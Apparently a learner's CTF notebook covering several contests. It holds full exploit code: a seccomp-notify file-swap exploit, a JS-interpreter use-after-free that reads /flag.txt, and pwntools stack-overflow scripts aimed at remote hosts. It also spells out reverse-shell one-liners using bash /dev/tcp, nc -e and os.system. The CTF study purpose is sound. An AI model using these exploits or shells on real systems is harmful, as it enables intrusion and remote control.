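In short, symbols are bound to version nodes; one symbol can have several version nodes, and the map file is the key piece.

Binding information can also be added in the library's source code, which reduces work for the shared-library maintainer, but the map file must still list every version node, so this asm trick only supplements the map file.

After testing, payload.c from the solution can be cut down substantially, and the 2.34 definition in payload.map can also be removed:

  • puts is completely unnecessary: once __libc_start_main has been replaced by the write routine, the goal is already achieved.
  • The original source uses asm to make __libc_start_main_impl an alias of __libc_start_main,
    but the impl name can be dropped and __libc_start_main defined directly.
  • The header files are unnecessary too, and so is 2.2.5. I don't know why that version number is used.
  • Trying again a month later, neither 2.2.5 nor 2.34 could be removed from payload.map, otherwise libc reports version not found. The cause is unknown; probably the loader checks that every version node the binary requires from libc is defined by the library.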
exp:
#define _GNU_SOURCE
#include <errno.h>
#include <fcntl.h>
#include <limits.h>
#include <linux/audit.h>
#include <linux/filter.h>
#include <linux/seccomp.h>
#include <signal.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/ioctl.h>
#include <sys/prctl.h>
#include <sys/socket.h>
#include <sys/stat.h>
#include <sys/syscall.h>
#include <sys/types.h>
#include <sys/un.h>
#include <unistd.h>

#define errExit(msg)    \
  do                    \
  {                     \
    perror(msg);        \
    exit(EXIT_FAILURE); \
  } while (0)

/* Send the file descriptor 'fd' over the connected UNIX domain socket
  'sockfd'. Returns 0 on success, or -1 on error. */

static int sendfd(int sockfd, int fd)
{
  struct msghdr msgh;
  struct iovec iov;
  int data;
  struct cmsghdr *cmsgp;

  /* Allocate a char array of suitable size to hold the ancillary data.
     However, since this buffer is in reality a 'struct cmsghdr', use a
     union to ensure that it is suitably aligned. */
  union
  {
    char buf[CMSG_SPACE(sizeof(int))];
    /* Space large enough to hold an 'int' */
    struct cmsghdr align;
  } controlMsg;

  /* The 'msg_name' field can be used to specify the address of the
     destination socket when sending a datagram. However, we do not
     need to use this field because 'sockfd' is a connected socket. */

  msgh.msg_name = NULL;
  msgh.msg_namelen = 0;

  /* On Linux, we must transmit at least one byte of real data in
     order to send ancillary data. We transmit an arbitrary integer
     whose value is ignored by recvfd(). */

  msgh.msg_iov = &iov;
  msgh.msg_iovlen = 1;
  iov.iov_base = &data;
  iov.iov_len = sizeof(int);
  data = 12345;

  /* Set 'msghdr' fields that describe ancillary data */

  msgh.msg_control = controlMsg.buf;
  msgh.msg_controllen = sizeof(controlMsg.buf);

  /* Set up ancillary data describing file descriptor to send */

  cmsgp = CMSG_FIRSTHDR(&msgh);
  cmsgp->cmsg_level = SOL_SOCKET;
  cmsgp->cmsg_type = SCM_RIGHTS;
  cmsgp->cmsg_len = CMSG_LEN(sizeof(int));
  memcpy(CMSG_DATA(cmsgp), &fd, sizeof(int));

  /* Send real plus ancillary data */

  if (sendmsg(sockfd, &msgh, 0) == -1)
    return -1;

  return 0;
}

/* Receive a file descriptor on a connected UNIX domain socket. Returns
  the received file descriptor on success, or -1 on error. */

static int recvfd(int sockfd)
{
  struct msghdr msgh;
  struct iovec iov;
  int data, fd;
  ssize_t nr;

  /* Allocate a char buffer for the ancillary data. See the comments
     in sendfd() */
  union
  {
    char buf[CMSG_SPACE(sizeof(int))];
    struct cmsghdr align;
  } controlMsg;
  struct cmsghdr *cmsgp;

  /* The 'msg_name' field can be used to obtain the address of the
     sending socket. However, we do not need this information. */

  msgh.msg_name = NULL;
  msgh.msg_namelen = 0;

  /* Specify buffer for receiving real data */

  msgh.msg_iov = &iov;
  msgh.msg_iovlen = 1;
  iov.iov_base = &data; /* Real data is an 'int' */
  iov.iov_len = sizeof(int);

  /* Set 'msghdr' fields that describe ancillary data */

  msgh.msg_control = controlMsg.buf;
  msgh.msg_controllen = sizeof(controlMsg.buf);

  /* Receive real plus ancillary data; real data is ignored */

  nr = recvmsg(sockfd, &msgh, 0);
  if (nr == -1)
    return -1;

  cmsgp = CMSG_FIRSTHDR(&msgh);

  /* Check the validity of the 'cmsghdr' */

  if (cmsgp == NULL || cmsgp->cmsg_len != CMSG_LEN(sizeof(int)) ||
      cmsgp->cmsg_level != SOL_SOCKET || cmsgp->cmsg_type != SCM_RIGHTS)
  {
    errno = EINVAL;
    return -1;
  }

  /* Return the received file descriptor to our caller */

  memcpy(&fd, CMSG_DATA(cmsgp), sizeof(int));
  return fd;
}

static void sigchldHandler(int sig)
{
  // char msg[] = "\tS: target has terminated; bye\n";

  // write(STDOUT_FILENO, msg, sizeof(msg) - 1);
  puts("Child exited");
  _exit(EXIT_SUCCESS);
}

static int seccomp(unsigned int operation, unsigned int flags, void *args)
{
  return syscall(__NR_seccomp, operation, flags, args);
}

#define X32_SYSCALL_BIT 0x40000000

#define X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR                                  \
  BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, arch))),   \
      BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, AUDIT_ARCH_X86_64, 0, 2),            \
      BPF_STMT(BPF_LD | BPF_W | BPF_ABS, (offsetof(struct seccomp_data, nr))), \
      BPF_JUMP(BPF_JMP | BPF_JGE | BPF_K, X32_SYSCALL_BIT, 0, 1),              \
      BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_KILL_PROCESS)

static int installNotifyFilter(void)
{
  struct sock_filter filter[] = {
      X86_64_CHECK_ARCH_AND_LOAD_SYSCALL_NR,

      BPF_JUMP(BPF_JMP | BPF_JEQ | BPF_K, __NR_openat, 0, 1),
      BPF_STMT(BPF_RET + BPF_K, SECCOMP_RET_USER_NOTIF),

      BPF_STMT(BPF_RET | BPF_K, SECCOMP_RET_ALLOW),
  };

  struct sock_fprog prog = {
      .len = sizeof(filter) / sizeof(filter[0]),
      .filter = filter,
  };

  int notifyFd =
      seccomp(SECCOMP_SET_MODE_FILTER, SECCOMP_FILTER_FLAG_NEW_LISTENER, &prog);
  if (notifyFd == -1)
    errExit("seccomp-install-notify-filter");

  return notifyFd;
}

static void closeSocketPair(int sockPair[2])
{
  if (close(sockPair[0]) == -1)
    errExit("closeSocketPair-close-0");
  if (close(sockPair[1]) == -1)
    errExit("closeSocketPair-close-1");
}

static pid_t targetProcess(int sockPair[2], char *argv[])
{
  pid_t targetPid = fork();
  if (targetPid == -1)
    errExit("fork");

  if (targetPid > 0) /* In parent, return PID of child */
    return targetPid;

  if (prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0))
    errExit("prctl");

  int notifyFd = installNotifyFilter();

  if (sendfd(sockPair[0], notifyFd) == -1)
    errExit("sendfd");

  /* Notification and socket FDs are no longer needed in target */

  if (close(notifyFd) == -1)
    errExit("close-target-notify-fd");

  closeSocketPair(sockPair);

  /* Give the supervisor a moment to start listening, then exec the target */
  puts("Executing child");
  sleep(1);
  char *f = NULL;
  execve("/home/pwn/readme", &f, &f);
  // openat(AT_FDCWD,"/bin/bash",0);
  exit(EXIT_SUCCESS);
}

static void allocSeccompNotifBuffers(struct seccomp_notif **req,
                                     struct seccomp_notif_resp **resp,
                                     struct seccomp_notif_sizes *sizes)
{
  if (seccomp(SECCOMP_GET_NOTIF_SIZES, 0, sizes) == -1)
    errExit("seccomp-SECCOMP_GET_NOTIF_SIZES");

  *req = malloc(sizes->seccomp_notif);
  if (*req == NULL)
    errExit("malloc-seccomp_notif");

  size_t resp_size = sizes->seccomp_notif_resp;
  if (sizeof(struct seccomp_notif_resp) > resp_size)
    resp_size = sizeof(struct seccomp_notif_resp);

  *resp = malloc(resp_size);
  if (*resp == NULL)
    errExit("malloc-seccomp_notif_resp");
}

static void handleNotifications(int notifyFd)
{
  struct seccomp_notif_sizes sizes;
  struct seccomp_notif *req;
  struct seccomp_notif_resp *resp;
  char path[PATH_MAX];

  allocSeccompNotifBuffers(&req, &resp, &sizes);

  /* Loop handling notifications */

  for (;;)
  {
    /* Wait for next notification, returning info in '*req' */

    memset(req, 0, sizes.seccomp_notif);
    if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_RECV, req) == -1)
    {
      if (errno == EINTR)
        continue;
      errExit("\tS: ioctl-SECCOMP_IOCTL_NOTIF_RECV");
    }

    if (req->data.nr != __NR_openat)
    {
      printf(
          "\tS: notification contained unexpected "
          "system call number; bye!!!\n");
      exit(EXIT_FAILURE);
    }

    struct seccomp_notif_addfd addfd;
    addfd.id = req->id; /* Cookie from SECCOMP_IOCTL_NOTIF_RECV */
    addfd.srcfd = openat(req->data.args[0], "/tmp/payload", req->data.args[2], req->data.args[3]);
    addfd.newfd = 3;
    addfd.flags = SECCOMP_ADDFD_FLAG_SETFD;
    addfd.newfd_flags = 0;
    int a2 = ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_ADDFD, &addfd);

    resp->id = req->id;
    resp->flags = 0;
    resp->error = 0;
    resp->val = a2; /* fd number installed in the target becomes openat's return value */

    if (ioctl(notifyFd, SECCOMP_IOCTL_NOTIF_SEND, resp) == -1)
    {
      if (errno == ENOENT)
        printf(
            "\tS: response failed with ENOENT; "
            "perhaps target process's syscall was "
            "interrupted by a signal?\n");
      else
        perror("ioctl-SECCOMP_IOCTL_NOTIF_SEND");
    }
  }

  free(req);
  free(resp);
  exit(EXIT_FAILURE);
}

/* Implementation of the supervisor process:

  (1) obtains the notification file descriptor from 'sockPair[1]'
  (2) handles notifications that arrive on that file descriptor. */

static void supervisor(int sockPair[2])
{
  int notifyFd = recvfd(sockPair[1]);
  if (notifyFd == -1)
    errExit("recvfd");

  closeSocketPair(sockPair); /* We no longer need the socket pair */

  handleNotifications(notifyFd);
}

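void readBinary()
{
  int sz, readed;
  printf("size:");
  if (scanf("%d", &sz) != 1 || sz <= 0)
    errExit("scanf-size");
  char *buf = malloc(sz);
  if (buf == NULL)
    errExit("malloc-payload");

  int f = open("/tmp/payload", O_WRONLY | O_CREAT, 0777);
  if (f == -1)
    errExit("open-payload");
  while (sz > 0)
  {
    readed = read(0, buf, sz);
    if (readed <= 0) /* EOF or error: stop instead of looping forever */
      break;
    write(f, buf, readed);
    sz -= readed;
  }
  close(f); /* make sure the payload is complete before the target opens it */
  free(buf);
}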

int main(int argc, char *argv[])
{
  int sockPair[2];

  setbuf(stdout, NULL);
  readBinary();
  if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockPair) == -1)
    errExit("socketpair");

  struct sigaction sa;
  sa.sa_handler = sigchldHandler;
  sa.sa_flags = 0;
  sigemptyset(&sa.sa_mask);
      
  if (sigaction(SIGCHLD, &sa, NULL) == -1)
    errExit("sigaction");
  targetProcess(sockPair, &argv[optind]);

  supervisor(sockPair);

  exit(EXIT_SUCCESS);
}
payload:
// #include <unistd.h>
// #include <asm/unistd.h>

// __asm__(".symver __libc_start_main_impl,__libc_start_main@GLIBC_2.34");
// __asm__(".symver __libc_start_main_impl,__libc_start_main@GLIBC_2.2.5");
// __asm__(".symver puts_impl,puts@GLIBC_2.2.5");
// __asm__(".symver puts_impl,puts@GLIBC_2.34");


void __libc_start_main(){
    asm(".intel_syntax noprefix");
    asm("mov rax,1");
    asm("mov rsi,rdi");
    asm("mov rdi,1");
    asm("mov rdx,0x1000");
    asm("syscall");
}

// void puts_impl(){
//     asm(".intel_syntax noprefix");
//     asm("mov rax,1");
//     asm("mov qword ptr [rax],1");
// }
map:
GLIBC_2.34 {
        global: __libc_start_main;puts;
        local:  *;      # Hide all other symbols
};
GLIBC_2.2.5 {
        global: __libc_start_main;
        local:  *;      # Hide all other symbols
};

solution 3 - ?

team solution

#include <sys/prctl.h>
#include <unistd.h>

int main(void)
{
        prctl(PR_SET_NO_NEW_PRIVS, 1, 0, 0, 0);
        execlp("bash", "bash", "-c", "LD_DEBUG=all sudo", NULL);
}

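And then? I didn't understand it.

Hmm, it feels like one step of the previous approach.

  • LD_DEBUG makes ld print information while loading shared libraries, including symbol information.
  • PR_SET_NO_NEW_PRIVS prevents programs started by later exec calls from gaining new privileges through set-user-ID/set-group-ID bits or file permissions.

Source of this solution: link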

jsy

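This is the shortest exploit. The longest ones run to thousands of lines and I can't tell what they do. I can't tell what the shortest one does either.

I found the documentation: it is a JS interpreter, an existing project. Is the patch a vulnerability that really existed? The code base is huge… and I don't know JS well…

The free added by the patch allows a double free. With glibc 2.35, reclaiming the freed slot gives control over an object header and thus arbitrary read/write.

There is no Buffer, but Array can be used; the header size should be 0x90.

When an Array is freed, apparently only the header is freed and the body is not.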

Explanation from @zanderdk:

Short explanation: We use quit to create an object of type JS_CCFUNCTION, which has the C union type below:

struct js_Object
{
    char noTcacheOverwrite[0x18]; 
    enum js_Class type;
    int extensible;
    js_Property *properties;
    int count; /* number of properties, for array sparseness check */
    js_Object *prototype;
    union {
....
        struct {
            const char *name;
            js_CFunction function;
            js_CFunction constructor;
            int length;
            void *data; 
            js_Finalize finalize;
        } c;

js_CFunction function; is a function pointer. We then free this object (target in hax.js) but keep a reference to it, and we allocate it back using:

static void S_fromCharCode(js_State *J)
{
    int i, top = js_gettop(J);
    char * volatile s = NULL;
    char *p;
    Rune c;
    if (js_try(J)) {
        js_free(J, s);
        js_throw(J);
    }
    s = p = js_malloc(J, (top-1) * UTFmax + 1);
    for (i = 1; i < top; ++i) {
        c = js_touint32(J, i);
        p += runetochar(p, &c);
    }
    *p = 0;
    js_pushstring(J, s);
    js_endtry(J);
    js_free(J, s);
}

Then we partially overwrite the function pointer with the address of static void jsB_read(js_State *J), which puts the content of a file into a JS string. The problem here is the *p = 0; in the C above, as it inserts a null terminator into the address. So we just run it enough times for ASLR to pick an address with 0 at that position. Also, runetochar does some UTF-8 magic to some of the bytes we put in if they are outside the ASCII range, so it probably takes a bit more than 255 tries.
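
The byte layout produced by the String.fromCharCode call in the exploit below can be checked with a small sketch. It assumes runetochar emits standard UTF-8, so Python's str.encode is used as a stand-in; the list mirrors the non-pointer arguments of the exploit, and the function name is illustrative.

```python
def encoded_offsets(code_points):
    """Return (offset of each code point, total length) after UTF-8 encoding."""
    offsets = []
    pos = 0
    for cp in code_points:
        offsets.append(pos)
        pos += len(chr(cp).encode('utf-8'))
    return offsets, pos

JS_CCFUNCTION = 4

# Arguments of String.fromCharCode before the partial overwrite begins
PREFIX = (
    [0x010000] * 6                   # 0x18 bytes of padding (noTcacheOverwrite)
    + [JS_CCFUNCTION, 0x41, 0x41, 0x41]  # type
    + [0x010000] * 5                 # extensible, properties, count, padding
    + [0x0800]                       # start of prototype (3 bytes)
    + [0x43] * 9
    + [0x41] * 4
)

if __name__ == '__main__':
    offsets, total = encoded_offsets(PREFIX)
    print(hex(offsets[6]), hex(total))
```

Under these assumptions the type field lands at +0x18 and the three overwrite bytes start at +0x40, which matches the position of js_CFunction function in the struct shown above on a 64-bit build. Overwrite bytes of 0x80 or more would each encode to two bytes, which is the "UTF-8 magic" mentioned in the quote.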

exp:

JS_CCFUNCTION = 4 /* built-in function */
var a = "";
for (var i = 0; i < 0x20; i++) {
    a += "\x08";
}
var thingy = {};
var dummy1 = {};
var dummy2 = {};
var dummy3 = {};
var dummy4 = {};
var target = quit;
var over = "A";
free(target);
free(thingy);
a.toLowerCase();

var a = ((target.length) & 0xffffff) - 0x2c2;
print(a);

lol = String.fromCharCode(
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    0x010000,
    JS_CCFUNCTION, /* +0x18 */
    0x41,
    0x41,
    0x41,
    0x010000,      /* +0x1c : extensible */
    0x010000,      /* properties */
    0x010000,
    0x010000,      /* count  */
    0x010000,
    0x0800,      /* prototype  */
    0x43,      /*  */
    0x43,      /*  */
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x43,
    0x41,
    0x41,
    0x41,
    0x41,
    // partial overwrite start here
    a & 0xff,
    (a >> 8) & 0xff,
    (a >> 16) & 0xff
)

print(target("/flag.txt"));
while(1);
-- EOF --

Escape maze

Haven't looked at it yet.

from pwn import *
conn=remote("65.21.255.31",34979)
r=b'0'
while 1:
    u=conn.recvuntil(b'key number:')
    print(u)
    nr=u.split(b'\n')[-2].split(b' ')[-8].replace(b',',b'')
    if nr!=r:
        conn.sendline(nr)
        r=nr
    else:
        conn.sendline(u.split(b'\n')[1].split(b' ')[-1])

CSR 2022

PWNMEPLX

CSR 2022

┌──(root💀kali)-[/mnt/LearingList/CTF/PWNMEPLX]
└─# checksec pwn             
[*] '/mnt/LearingList/CTF/PWNMEPLX/pwn'
    Arch:     amd64-64-little
    RELRO:    Partial RELRO
    Stack:    No canary found
    NX:       NX enabled
    PIE:      No PIE (0x400000)

This is how absolute value is written in x64 assembly:

.text:0000000000401336 8B 45 8C                                   mov     eax, [rbp+var_74]
.text:0000000000401339 99                                         cdq
.text:000000000040133A 89 D0                                      mov     eax, edx
.text:000000000040133C 33 45 8C                                   xor     eax, [rbp+var_74]
.text:000000000040133F 29 D0                                      sub     eax, edx
.text:0000000000401341 C9                                         leave
.text:0000000000401342 C3                                         retn
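
The cdq / xor / sub sequence is the usual branchless absolute value. A minimal Python model of the 32-bit arithmetic follows; the function names are illustrative.

```python
def to_int32(x: int) -> int:
    """Truncate to 32 bits and reinterpret as a signed int."""
    x &= 0xFFFFFFFF
    return x - (1 << 32) if x & 0x80000000 else x

def abs32(x: int) -> int:
    """Model of: cdq; mov eax, edx; xor eax, [x]; sub eax, edx."""
    x = to_int32(x)
    mask = -1 if x < 0 else 0          # cdq fills edx with the sign bit of eax
    return to_int32((x ^ mask) - mask)  # (x ^ mask) - mask == |x| except for INT_MIN

if __name__ == '__main__':
    for value in (7, -5, -2**31):
        print(value, '->', abs32(value))
```

The one input that stays negative is INT_MIN (-2**31), the classic edge case of this idiom.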

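A simple stack overflow that overwrites the return address still crashed, because the xmmword access at <__vfscanf_internal+133> requires 0x10-byte alignment…

Too simple to say much about. It still took me a while, because I kept wondering whether it was a sign or floating-point issue; in the end it was just a plain stack overflow with a backdoor.

The pwn challenges in this contest were all warm-ups, which was a bit underwhelming.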

from pwn import *
context.binary = './pwn.elf64'
context.log_level = 'debug'
ss=lambda x:p.send(x)       #send string
sl=lambda x:p.sendline(x)
ru=lambda x:p.recvuntil(x)
rl=lambda :p.recvline()
ra=lambda :p.recv()         #recv one
rn=lambda x:p.recv(x)       #recv n
sla=lambda x,y:p.sendlineafter(x,y)
itt=lambda :p.interactive()
c = 0
if c == 0:
    p = remote("chall.rumble.host", 5415)
else:
    p = process("./pwn.elf64")

payload = b'b'*(112+8) + pack(0x401348, 64)
sl(b"-1")
sl(payload)
itt()

PWNFORTRESS

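Same contest as above, but this challenge is rev+game. I could barely do any of it.

The main problem: the glibc version was known, but Ubuntu's packages from 2.3x onward are all compressed with .zst, which dpkg could not unpack. I switched to the Debian glibc packages from the Tsinghua mirror, but the dbg package did not contain library files with symbols either. I couldn't work out how to use them, and after studying the glibc-all-in-one code for a long time I didn't know how to modify it, so I simply went without symbols. It does run directly on Ubuntu 22.04, though.

Debian glibc file category | TUNA mirror site

Couldn't solve it.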

unintended solution:

breakpoint before the level is printed, make it print the last level instead, it will segfault, but the decoded map is in memory


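Every challenge I looked at carried three tags: cry, misc, pwn. I have never touched crypto or misc, so no chance there, and on top of that came VM escapes and things like RISC-JIT that I had never heard of. Blind spots everywhere.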

Hackergame 2022

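Skipped the easy challenges; I didn't want to spend time on them. The ones I can solve teach me nothing, and the ones that would teach me something I mostly can't solve.

猫咪问答 (Cat Q&A): couldn't be bothered. 旅行图片 (Travel Photos): OSINT, couldn't be bothered. Pure time sinks.

签到 (Sign-in): add a logpoint in the touchStart function of the mousedown event listener so that lefttime never changes.

HeiLang: a boring syntax conversion.

Flag自动机 (Flag Automaton): a Windows program. IDA's decompilation shows a message callback function; in Cheat Engine I made x and y stop being random, then changed one variable to enter flag generation.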

One-byte-man

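Quite fascinating. The code is full of Linux concepts I hadn't looked at yet…

  • prctl option PR_SET_CHILD_SUBREAPER: sets a process-tree attribute so that orphans in the tree are re-parented to the nearest ancestor that has the attribute set.
    The attribute is preserved across execve but is not inherited through fork or clone.

  • Read the namespace man page carefully: the CLONE_NEW* family of flags.

  • user_namespace: A process's user and group IDs can be different inside and outside a user namespace.

    • Namespaces form a tree. setns, unshare, and clone can create new child namespaces.
    • User and group ID mappings: uid_map and gid_map
      • In the root namespace both files show 0 0 4294967295. The third field is -1 when read as a signed number, but it is really a length: the whole uid range is mapped. Since Linux 4.15 each map file may contain up to 340 lines.
      • Processes in different namespaces that read the uid_map file of the same process may see different results.
      • Each line is a mapping: when the reader is in the same namespace, it maps inner uid -> parent-namespace uid; when the reader is in a different namespace, it maps inner uid -> uid in the reader's namespace.
      • The writer must be in the parent namespace or in the same namespace; the mapped uids must themselves have a mapping in the writer's namespace; and the writer needs the corresponding capabilities.
    printf '0 1000 1\n1000 0 1\n' | sudo tee /proc/121634/uid_map
    
    • The /proc/[pid]/setgroups file
      • setgroups() sets the supplementary group IDs for the calling process.
      • While gid_map is not set, or while the file above shows "deny", setgroups() cannot be used.
      • Once gid_map has been written (which fixes whether setgroups is enabled), the file can no longer be changed by writing to it.
        A process can only move from setgroups being disallowed (nothing mapped) to setgroups being allowed (allow written).
      • Added in Linux 3.19. It fixes the "rwx---rwx" file problem, where moving to the "other" class actually grants more access, by denying any pathway for an unprivileged process to drop groups with setgroups(2).
    • /proc/sys/kernel/overflowuid: the number shown when reading a uid that has no mapping. When the second field of uid_map has no mapping, 4294967295 may also be shown.
    • For permission checks the uid is converted to the uid in the initial user namespace.
  • capabilities:

    • A process has several capability sets (permitted, inheritable, effective, bounding, ambient); a file has permitted and inheritable sets plus an effective bit.
    • I stared at the process sets for ages without understanding how they actually operate. Only effective and bounding make sense to me. bounding appears to be the universe, although it can be reduced as well, for reasons unclear to me. The permitted set should be the capabilities the process is allowed to acquire. ambient I don't understand at all.
    • The figure in the original post shows how capabilities change across execve. Note that when the file's effective bit is 1, the file's permitted capabilities end up in the effective set; this is what blog posts demonstrating ping rely on, i.e. cap_net_raw+ep. How does this differ from ambient?
  • credentials

    • There is also a filesystem user ID and filesystem group ID. I can only say I don't know what they are for; all I saw is that they are used together with the supplementary group IDs to decide file access permissions.
    • Supplementary group IDs: a user belongs to one primary group and at the same time to several supplementary groups, so there is no need to switch groups; mainly a convenience. In the output of id, everything after the first group is supplementary.
  • Tools: capsh, getcap, setcap, getpcaps, and grep Cap /proc/self/status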
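
Since the execve figure is not reproduced here, the transformation rules can be sketched with Python sets. The formulas follow capabilities(7) as I understand it; the sketch deliberately ignores the special handling of root and of set-user-ID binaries, treats a file as privileged only if it carries file capabilities, and all names are illustrative.

```python
def caps_after_execve(proc: dict, file_caps: dict) -> dict:
    """Apply the execve() capability rules to sets of capability names.

    proc:      {'inheritable': set, 'bounding': set, 'ambient': set}
    file_caps: {'permitted': set, 'inheritable': set, 'effective': bool}
    """
    # Simplification: only file capabilities make the file "privileged" here
    file_is_privileged = bool(
        file_caps['permitted'] or file_caps['inheritable'] or file_caps['effective']
    )
    new_ambient = set() if file_is_privileged else set(proc['ambient'])
    new_permitted = (
        (proc['inheritable'] & file_caps['inheritable'])
        | (file_caps['permitted'] & proc['bounding'])
        | new_ambient
    )
    new_effective = set(new_permitted) if file_caps['effective'] else set(new_ambient)
    return {
        'permitted': new_permitted,
        'effective': new_effective,
        'inheritable': set(proc['inheritable']),
        'bounding': set(proc['bounding']),
        'ambient': new_ambient,
    }

if __name__ == '__main__':
    shell = {'inheritable': set(), 'bounding': {'cap_net_raw', 'cap_sys_admin'}, 'ambient': set()}
    ping = {'permitted': {'cap_net_raw'}, 'inheritable': set(), 'effective': True}
    print(caps_after_execve(shell, ping))
```

In this model the ping case (cap_net_raw+ep) gets its capability from the file, whereas ambient capabilities come from the process and survive execve of an ordinary file with no capabilities, which is one way to see the difference asked about above.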

看不见的彼方

Uh, went off to learn Rust first.

hack.lu 2022

ordersystem

start

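The first thing I spotted was socket.socket() in the Python code, so I looked up a few things I had never paid attention to.

  • When to use setsockopt: link

  • reuseaddr/reuseport: source walk-through of the lookup path; evolution of reuseport across versions

  • What the difference is between binding to 0.0.0.0, 127.0.0.1, and localhost

  • Hit a small problem with the Docker environment and rebuilt it. Why doesn't the connection respond?? A restart fixed it: service docker restart

  • Reverse shell

    • Command to run on the target: bash -i >& /dev/tcp/192.168.1.102/7777 0>&1: this starts bash interactively (-i) on the target and redirects standard output and standard error to 192.168.1.102:7777, while 0>&1 makes standard input read from the same connection, so commands typed at 192.168.1.102:7777 are fed to the shell.

      In short, the target's standard input, standard output, and standard error are all redirected to the attacker's side.

    • The above reverses a shell through bash; it can also be done with python, nc, perl, or php.
      nc 192.168.100.113 4444 -e /bin/bash

      python -c 'import socket,subprocess,os;................'

    • The attacker's host has to run nc -lvp 4444 to listen on the chosen port.

  • I have never looked into Python bytecode, so this is going to hurt. Where do you even search for this? It is closely tied to CPython. Then I ran into the Python VM. More Python fundamentals; so much new material again. This looks like a week of work, ahhhh.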

Bytecode notes:

I looked things up all over the place, so these notes are messy. The Python innards posts were the most readable part.

  • python built-in function: the last one is __import__, This function is invoked by import statements. Direct use of __import__() is also discouraged in favor of importlib.import_module()
    • e.g. __import__('os').system("ncat *.*.*.* **** -e /bin/sh")
  • ops:
    • LOAD_FAST(var_num): Pushes a reference to the local co_varnames[var_num] onto the stack.
    • STORE_FAST(var_num): Stores TOS into the local co_varnames[var_num].
    • RETURN_VALUE Returns with TOS to the caller of the function.
    • Instruction encodings can be looked up in dis.opmap. It took me an hour to work out… The second byte is the operand, i.e. the second number in each line of dis output.
    • BUILD_TUPLE(count): Creates a tuple consuming count items from the stack, and pushes the resulting tuple.
    • CALL_FUNCTION(argc): pops all arguments and the callable object, makes call, and pushes the return value.
      • I couldn't see where all the arguments get popped… It is probably done inside the function: in the switch, stack_pointer is reassigned after call_function.
      • Notably, a function such as print has no return value, yet a PyObject* holding None is still pushed onto the stack. In this challenge, calling it with 0 arguments can serve as a way to push None.
    • LOAD_METHOD(namei): Loads a method named co_names[namei] from the TOS object. TOS is popped.
      • if TOS has a method with the correct name, the bytecode pushes the unbound method and TOS. TOS will be used as the first argument (self) by CALL_METHOD when calling the unbound method.
      • Otherwise, NULL and the object return by the attribute lookup are pushed.
    • CALL_METHOD(argc): the operand is self-explanatory.
      • Positional arguments are on top + two items described in LOAD_METHOD
        (either self + an unbound method object or NULL + an arbitrary callable)
      • Removed outright in 3.11, where LOAD_METHOD is paired with PRECALL instead. Every version really is different… I'll look at it when I need to.
    • IMPORT_NAME(namei): Imports the module co_names[namei]. TOS and TOS1 are popped and provide the fromlist and level arguments of __import__(). The module object is pushed onto the stack. In practice TOS1 need not be popped: it is read and then overwritten in place with the return value.
      • IMPORT_NAME is usually followed by STORE_FAST to stash the module; when something like os.system needs to be called, LOAD_FAST fetches the os module for LOAD_METHOD.
      • There are also IMPORT_STAR and IMPORT_FROM: the former imports all symbols from the module at TOS, the latter imports a specific name from it. Both clearly differ from IMPORT_NAME, which only imports the module.
  • Below is an example: before each CALL_FUNCTION the function and its arguments are loaded, and the operand is the number of arguments (the "1" on the second CALL_FUNCTION line).
In [1]: def test():
   ...:     print("test string")
    
In [2]: def test_test():
   ...:     test()
   ...:     print("test_test string")

In [3]: import dis
In [4]: dis.dis(test_test)
  2           0 LOAD_GLOBAL              0 (test)
              2 CALL_FUNCTION            0
              4 POP_TOP
  3           6 LOAD_GLOBAL              1 (print)
              8 LOAD_CONST               1 ('test_test string')
             10 CALL_FUNCTION            1                     
             12 POP_TOP                                        
             14 LOAD_CONST               0 (None)              
             16 RETURN_VALUE                                   
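
As a minimal sketch of the two-byte instruction format noted above (assuming CPython 3.6 or later, where each instruction is one opcode byte plus one operand byte), the hypothetical helpers decode_wordcode and assemble below convert between raw bytes and (opname, operand) pairs using dis.opname and dis.opmap. EXTENDED_ARG handling is deliberately left out.

```python
import dis

def decode_wordcode(raw: bytes):
    """Split raw CPython (3.6+) bytecode into (opname, operand) pairs.

    Hypothetical helper for illustration; it treats every 2-byte unit
    independently and does not combine EXTENDED_ARG prefixes.
    """
    pairs = []
    for offset in range(0, len(raw) - 1, 2):
        opcode, operand = raw[offset], raw[offset + 1]
        pairs.append((dis.opname[opcode], operand))
    return pairs

def assemble(instructions):
    """Inverse direction: (opname, operand) pairs -> raw bytes via dis.opmap."""
    return b"".join(bytes([dis.opmap[name], arg]) for name, arg in instructions)

sample = assemble([("LOAD_CONST", 0), ("RETURN_VALUE", 0)])
print(decode_wordcode(sample))
```

The opcode numbers themselves differ between Python versions, so the raw bytes are only meaningful for the interpreter that produced them.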
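  • After reading around I still did not understand "Calls the function in position 7 on the stack with the top three items on the stack as arguments."
    Are positions 4, 5 and 6 simply unused? For the call they act as filler: per the 3.9-3.10 source comment below, they hold the previous exception triple. Reading python innards is probably the better route, even though it is a decade-old post.
    The 3.11 documentation says position 4 instead. The source comments below suggest why: in 3.11 exc_info() and the previous exception each occupy a single stack slot rather than three.

    Below is the CPython source. On the main branch the cases are no longer in ceval.c: because the switch grew too long it was split out into a separate file, generated_cases.c.h. The other version branches still keep them in ceval.c. I downloaded the CPython 3.11 source to look at the definitions.
    • exception below: python doc
    • exc_info(): I did not fully understand this. sys.exc_info() is kept for backward compatibility, and nowadays traceback is used more (not sure which traceback).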
//branch 3.11:
		TARGET(WITH_EXCEPT_START) {
            /* At the top of the stack are 4 values:
               - TOP = exc_info()
               - SECOND = previous exception
               - THIRD: lasti of exception in exc_info()
               - FOURTH: the context.__exit__ bound method
               We call FOURTH(type(TOP), TOP, GetTraceback(TOP)).
               Then we push the __exit__ return value.
            */
            PyObject *exit_func;
            PyObject *exc, *val, *tb, *res;

            val = TOP();
            assert(val && PyExceptionInstance_Check(val));
            exc = PyExceptionInstance_Class(val);
            tb = PyException_GetTraceback(val);
            Py_XDECREF(tb);
            assert(PyLong_Check(PEEK(3)));
            exit_func = PEEK(4);
            PyObject *stack[4] = {NULL, exc, val, tb};
